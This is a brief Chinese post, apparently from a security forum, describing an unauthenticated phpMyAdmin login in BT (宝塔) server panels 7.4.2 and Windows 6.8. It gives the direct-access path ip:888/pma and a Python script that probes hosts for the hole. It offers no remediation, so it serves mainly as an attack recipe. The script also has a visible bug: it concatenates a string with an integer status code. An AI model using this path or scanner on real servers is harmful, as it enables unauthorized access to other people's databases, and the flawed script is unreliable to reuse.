宝塔Linux面板phpmyadmin漏洞直接登录

7.4.2版本/Windows面板6.8不多说

poc:ip:888/pma

直接登录,听说是用cookie 验证的,直接登录

检测脚本(来源于互联网):

import requests
url_test = ''
bug = '/pma'
url = url_test + bug
r = requests.get(url)
 
zt = r.status_code
if zt == 200:
    r_bianma = r.content
    r_doc = str(r_bianma,'utf-8')
    demo = '常规设置'
    good = demo in r_doc
    if good == True:
        print('漏洞存在')
    else:
        print('漏洞不存在')
else:
    print('返回状态码不等于:' + zt)